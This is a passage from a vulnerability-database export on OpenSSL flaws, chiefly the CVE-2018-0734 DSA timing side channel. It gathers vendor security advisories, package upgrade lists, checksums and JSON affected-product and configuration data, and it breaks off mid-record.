"id": "127940" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-128" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2014-3506" }, { "db": "BID", "id": "69076" }, { "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "128214" }, { "db": "PACKETSTORM", "id": "127803" }, { "db": "PACKETSTORM", "id": "127940" }, { "db": "PACKETSTORM", "id": "128387" }, { "db": "PACKETSTORM", "id": "127799" }, { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "PACKETSTORM", "id": "128297" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "CNNVD", "id": "CNNVD-201408-128" }, { "db": "NVD", "id": "CVE-2014-3506" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-08-13T00:00:00", "db": "VULMON", "id": "CVE-2014-3506" }, { "date": "2014-08-06T00:00:00", "db": "BID", "id": "69076" }, { "date": "2014-08-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "date": "2015-03-18T00:44:34", "db": "PACKETSTORM", "id": "130868" }, { "date": "2014-09-09T17:32:22", "db": "PACKETSTORM", "id": "128214" }, { "date": "2014-08-08T21:50:05", "db": "PACKETSTORM", "id": "127803" }, { "date": "2014-08-20T15:20:13", "db": "PACKETSTORM", "id": "127940" }, { "date": "2014-09-25T00:05:16", "db": "PACKETSTORM", "id": "128387" }, { "date": "2014-08-08T21:48:03", "db": "PACKETSTORM", "id": "127799" }, { "date": "2014-08-08T21:44:17", "db": "PACKETSTORM", "id": "127790" }, { "date": "2014-08-14T02:25:06", "db": "PACKETSTORM", "id": "127862" }, { "date": "2014-09-17T20:46:27", "db": "PACKETSTORM", "id": "128297" }, { "date": "2014-08-11T11:11:00", "db": "PACKETSTORM", "id": "127811" }, { "date": "2014-08-06T12:12:12", "db": "PACKETSTORM", "id": "169648" }, { "date": "2014-08-20T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-128" }, { "date": "2014-08-13T23:55:07.403000", "db": "NVD", "id": "CVE-2014-3506" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-29T00:00:00", "db": "VULMON", "id": "CVE-2014-3506" }, { "date": "2016-07-27T01:00:00", "db": "BID", "id": "69076" }, { "date": "2015-06-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003810" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-128" }, { "date": "2023-11-07T02:20:09.810000", "db": "NVD", "id": "CVE-2014-3506" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127790" }, { "db": "PACKETSTORM", "id": "127862" }, { "db": "CNNVD", "id": "CNNVD-201408-128" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of DTLS Implementation of d1_both.c Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003810" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "resource management error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-128" } ], "trust": 0.6 } }
var-201810-0932
Vulnerability from variot
The OpenSSL DSA signature algorithm has been shown to be vulnerable to a timing side channel attack. An attacker could use variations in the signing algorithm to recover the private key. Fixed in OpenSSL 1.1.1a (Affected 1.1.1). Fixed in OpenSSL 1.1.0j (Affected 1.1.0-1.1.0i). Fixed in OpenSSL 1.0.2q (Affected 1.0.2-1.0.2p). The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. The vulnerability stems from incorrect use of relevant cryptographic algorithms by network systems or products, resulting in improperly encrypted content, weak encryption, and storing sensitive information in plain text.
Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz: Upgraded. For more information, see: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5407 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0734 ( Security fix ) patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz: Upgraded. +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1u-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1u-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1u-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1u-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Updated packages for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-1.0.2q-i586-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Updated packages for Slackware x86_64 14.2: ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-1.0.2q-x86_64-1_slack14.2.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.1.1a-i586-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.1.1a-i586-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.1.1a-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.1.1a-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 packages: e6d4b3a76383f9f253da4128ba23f269 openssl-1.0.1u-i486-1_slack14.0.txz c61d31a1751ae39af89d3fee0b54f0d8 openssl-solibs-1.0.1u-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 96be19e6a96c9beb5d3bbc55348fb483 openssl-1.0.1u-x86_64-1_slack14.0.txz b7a8fa2ebd16c8ae106fc1267bc29eca openssl-solibs-1.0.1u-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 099b960e62eaea5d1a639a61a2fabca7 openssl-1.0.1u-i486-1_slack14.1.txz b5d5219e05db97f63c4d6c389d6884fb openssl-solibs-1.0.1u-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: fc96c87d76c9d1efd1290ac847fa7c7c openssl-1.0.1u-x86_64-1_slack14.1.txz e873b66f84f45ea34d028a3d524ce573 openssl-solibs-1.0.1u-x86_64-1_slack14.1.txz
Slackware 14.2 packages: d5f0cc19451e9c7e3967820cf02a20c6 openssl-1.0.2q-i586-1_slack14.2.txz 594ca80447baecd608a51083b12a26d9 openssl-solibs-1.0.2q-i586-1_slack14.2.txz
Slackware x86_64 14.2 packages: 943bb2f3259ccf97a1b8b25f5f511c30 openssl-1.0.2q-x86_64-1_slack14.2.txz 0d45afe2487c47b283c06902c56e4559 openssl-solibs-1.0.2q-x86_64-1_slack14.2.txz
Slackware -current packages: 6f01f6dd0f40a12e473320386cfc8536 a/openssl-solibs-1.1.1a-i586-1.txz 6e5a2ab2475a0d851376d12911b3c6b7 n/openssl-1.1.1a-i586-1.txz
Slackware x86_64 -current packages: eb4697703f1f4b81ad38e9247ab70dac a/openssl-solibs-1.1.1a-x86_64-1.txz 12a10fd6bd2344b3e73106c8d5b9828c n/openssl-1.1.1a-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.2q-i586-1_slack14.2.txz openssl-solibs-1.0.2q-i586-1_slack14.2.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Description:
This release adds the new Apache HTTP Server 2.4.37 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.29 and includes bug fixes and enhancements. After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys 1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm 1645695 - CVE-2018-5407 openssl: Side-channel vulnerability on SMT/Hyper-Threading architectures (PortSmash) 1668493 - CVE-2018-17199 httpd: mod_session_cookie does not respect expiry time 1668497 - CVE-2018-17189 httpd: mod_http2: DoS via slow, unneeded request bodies 1695020 - CVE-2019-0217 httpd: mod_auth_digest: access control bypass due to race condition 1695030 - CVE-2019-0196 httpd: mod_http2: read-after-free on a string compare 1695042 - CVE-2019-0197 httpd: mod_http2: possible crash on late upgrade 1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption 1741860 - CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service 1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service 1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
For the stable distribution (stretch), these problems have been fixed in version 1.1.0j-1~deb9u1. Going forward, openssl security updates for stretch will be based on the 1.1.0x upstream releases.
For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAlwBuAcACgkQEMKTtsN8 TjZbBw/+MOB5+pZbCHHXyH3IeD+yj+tSPvmNc3SCwdEtUxGXr0ZX7TKHfaLs/8s6 Udto0K8a1FvjrcUQCfhnFpNcSAv9pxX13Fr6Pd560miIfAu9/5jAqiCufCoiz+xj 45LNJGlaxxaFjgBGCitZSJA0Fc4SM6v5XFyJfR3kChdQ/3kGQbbMNAp16Fy3ZsxJ VXwviomUxmmmdvjxyhifTIpuwr9OiJSQ+13etQjTDQ3pzSbLBPSOxmpV0vPIC7I2 Dwa4zuQXA/DF4G6l8T4rXCwCN4e4pwbTc8bbCjXeZK+iVAhnRD6wXlS3cc5IVAzx /qTa89LZU8B6ylcB6nodeAHLuZTC3Le8ndoxYz5S2/jHZMM/jCQNHYJemHWNbOqn q+e5W0D1fIVLiLoL/iHW5XhN6yJY2Ma7zjXMRBnkzJA9CTNIKgUjrSFz0Ud+wIM/ u8QhNPwZ0hPd5IfSgIyWqmuQ5XzFYqAQvwT1gUJiK7tIvuT0VsSyKVaSZVbi4yrM 9sxkZaP1UNLcTVCFw6A0KFwhb9z6kQtyH1MRkFPphmnb8jlHA3cTdPJkFUBi3VaT 7izThm5/mVLbAjZ8X7nkqnzWzmc885j0ml3slDd/MOVWB5CD3vFAcI8k3VZr3A61 P2gNSN6UbAbLMGsxgs3hYUHgazi7MdXJ/aNavjGSbYBNL780Iaw=3Qji -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Low: openssl security, bug fix, and enhancement update Advisory ID: RHSA-2019:3700-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:3700 Issue date: 2019-11-05 CVE Names: CVE-2018-0734 CVE-2018-0735 CVE-2019-1543 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
The following packages have been upgraded to a later upstream version: openssl (1.1.1c).
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.1 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1644356 - CVE-2018-0735 openssl: timing side channel attack in the ECDSA signature generation 1644364 - CVE-2018-0734 openssl: timing side channel attack in the DSA signature algorithm 1668880 - ec man page lists -modulus but the tool doesn't support it 1686058 - specifying digest for signing time-stamping responses is mandatory 1686548 - Incorrect handling of fragmented KeyUpdate messages 1695954 - CVE-2019-1543 openssl: ChaCha20-Poly1305 with long nonces 1697915 - Race/segmentation fault on process shutdown in OpenSSL 1706104 - openssl asn1parse crashes with double free or corruption (!prev) 1706915 - OpenSSL should implement continuous random test or use the kernel AF_ALG interface for random 1712023 - openssl pkcs12 uses certpbe algorithm not compliant with FIPS by default 1714245 - DSA ciphers in TLS don't work with SHA-1 signatures even in LEGACY level
- Package List:
Red Hat Enterprise Linux BaseOS (v. 8):
Source: openssl-1.1.1c-2.el8.src.rpm
aarch64: openssl-1.1.1c-2.el8.aarch64.rpm openssl-debuginfo-1.1.1c-2.el8.aarch64.rpm openssl-debugsource-1.1.1c-2.el8.aarch64.rpm openssl-devel-1.1.1c-2.el8.aarch64.rpm openssl-libs-1.1.1c-2.el8.aarch64.rpm openssl-libs-debuginfo-1.1.1c-2.el8.aarch64.rpm openssl-perl-1.1.1c-2.el8.aarch64.rpm
ppc64le: openssl-1.1.1c-2.el8.ppc64le.rpm openssl-debuginfo-1.1.1c-2.el8.ppc64le.rpm openssl-debugsource-1.1.1c-2.el8.ppc64le.rpm openssl-devel-1.1.1c-2.el8.ppc64le.rpm openssl-libs-1.1.1c-2.el8.ppc64le.rpm openssl-libs-debuginfo-1.1.1c-2.el8.ppc64le.rpm openssl-perl-1.1.1c-2.el8.ppc64le.rpm
s390x: openssl-1.1.1c-2.el8.s390x.rpm openssl-debuginfo-1.1.1c-2.el8.s390x.rpm openssl-debugsource-1.1.1c-2.el8.s390x.rpm openssl-devel-1.1.1c-2.el8.s390x.rpm openssl-libs-1.1.1c-2.el8.s390x.rpm openssl-libs-debuginfo-1.1.1c-2.el8.s390x.rpm openssl-perl-1.1.1c-2.el8.s390x.rpm
x86_64: openssl-1.1.1c-2.el8.x86_64.rpm openssl-debuginfo-1.1.1c-2.el8.i686.rpm openssl-debuginfo-1.1.1c-2.el8.x86_64.rpm openssl-debugsource-1.1.1c-2.el8.i686.rpm openssl-debugsource-1.1.1c-2.el8.x86_64.rpm openssl-devel-1.1.1c-2.el8.i686.rpm openssl-devel-1.1.1c-2.el8.x86_64.rpm openssl-libs-1.1.1c-2.el8.i686.rpm openssl-libs-1.1.1c-2.el8.x86_64.rpm openssl-libs-debuginfo-1.1.1c-2.el8.i686.rpm openssl-libs-debuginfo-1.1.1c-2.el8.x86_64.rpm openssl-perl-1.1.1c-2.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-0734 https://access.redhat.com/security/cve/CVE-2018-0735 https://access.redhat.com/security/cve/CVE-2019-1543 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.1_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXcHzTdzjgjWX9erEAQjP6w/8D4eIfwgPbpKXdy3Y2kjmKhb9faqBJvHm eqpG5tewJQBtRAPm/R7SesrMVKGUEDAuiSKydQlQn8nuRIWDsKw14+uLRN7AyTQ3 jXy0pnp+C7O1hyJnwNEiXo9ZgUaXMMXLGyTk8v9gnzA/HYpZX1c4g4FXHf0ycBi/ thxllEiJx6CrEO3pszYzu1Lt9GFMOAJPvwbiW0S7mVmsNCI4n+5OfeNzmURXdObs 89/XCFrQO3CDAh3SXCZa08Ie8px7Aq8slmNWOswhlqIYkUWGUbICIpqW1+4XyAqz hVP8iqTY7TRwBPB0zoqmO5cxMY+jqMk/LphG+oTOF+ZA7YZH3bjDxJisCOr+ys+i WnTYAl1KFBqo5uhH4dBzNH2EE5PeiwKNKqu6Wws1qOblTFXb3AYSHsqLv6VB0m1B MXcUXrjSMwelSVAgK1eekJsYqCr3lT1+N8cA8P/sgT/DzGTNJhcoCE/OeJCUVBZL uGhke48CUs3GvXCKP0+PDpINRRllGwVqkkCQ7LtsXoB0hGaaGt+CNCd3aQj8rf02 mPi2Vab7CjBLUn1QGiNigLF4X4rKZlxiBcHDByyHdeCW+zHvGod7ksmJKXmHujvY pdg6toj/our0hhQp2dPTXFPKFtkO7GIIe19i+OZ6Rn0niVxSQbshiXyFFsvgZN0F 82vSbeKouJA= =mdzd -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ========================================================================== Ubuntu Security Notice USN-3840-1 December 06, 2018
openssl, openssl1.0 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.10
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
Summary:
Several security issues were fixed in OpenSSL. (CVE-2018-0734)
Samuel Weiser discovered that OpenSSL incorrectly handled ECDSA signing. This issue only affected Ubuntu 18.04 LTS and Ubuntu 18.10. (CVE-2018-0735)
Billy Bob Brumley, Cesar Pereida Garcia, Sohaib ul Hassan, Nicola Tuveri, and Alejandro Cabrera Aldaya discovered that Simultaneous Multithreading (SMT) architectures are vulnerable to side-channel leakage. This issue is known as "PortSmash". (CVE-2018-5407)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 18.10: libssl1.0.0 1.0.2n-1ubuntu6.1 libssl1.1 1.1.1-1ubuntu2.1
Ubuntu 18.04 LTS: libssl1.0.0 1.0.2n-1ubuntu5.2 libssl1.1 1.1.0g-2ubuntu4.3
Ubuntu 16.04 LTS: libssl1.0.0 1.0.2g-1ubuntu4.14
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.27
After a standard system update you need to reboot your computer to make all the necessary changes.
Due to the low severity of this issue we are not issuing a new release of OpenSSL 1.1.1, 1.1.0 or 1.0.2 at this time. The fix is also available in commit 8abfe72e8c (for 1.1.1), ef11e19d13 (for 1.1.0) and commit 43e6a58d49 (for 1.0.2) in the OpenSSL git repository.
As a result of the changes made to mitigate this vulnerability, a new side channel attack was created. The mitigation for this new vulnerability can be found in these commits: 6039651c43 (for 1.1.1), 26d7fce13d (for 1.1.0) and 880d1c76ed (for 1.0.2)
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20181030.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0932", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "enterprise manager ops center", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.3.3" }, { "model": "e-business suite technology stack", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "0.9.8" }, { "model": "santricity smi-s provider", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.1.0i" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.9.0" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "10.12.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "8.14.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "8.9.0" }, { "model": "mysql enterprise backup", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "3.12.3" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "10.0.0" }, { "model": "e-business suite technology stack", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.0.1" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.1.0" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.0.5.0" }, { "model": "cloud backup", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "e-business suite technology stack", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.0.0" }, { "model": "tuxedo", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "12.1.1.0.0" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "18.8" }, { "model": "cn1610", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "11.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.10" }, { "model": "mysql enterprise backup", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "4.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "11.3.0" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "8.0.0" }, { "model": "snapcenter", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.55" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.57" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.2.0.0.0" }, { "model": "mysql enterprise backup", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.1.2" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "15.1" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": "*" }, { "model": "primavera p6 professional project management", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "17.7" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "16.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "storage automation store", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "16.2" }, { "model": "primavera p6 professional project management", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "17.12" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "18.04" }, { "model": "mysql enterprise backup", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "3.0" }, { "model": "steelstore", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "8.8.1" }, { "model": "node.js", "scope": "eq", "trust": 1.0, "vendor": "nodejs", "version": "10.13.0" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2p" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.15.0" }, { "model": "api gateway", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "15.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.3.0.0.0" }, { "model": "primavera p6 professional project management", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.4" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.1.1" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "6.8.1" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "8.56" } ], "sources": [ { "db": "NVD", "id": "CVE-2018-0734" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.1.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.2p", "versionStartIncluding": "1.0.2", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.1.0i", "versionStartIncluding": "1.1.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe_name": [], "vulnerable": true }, { 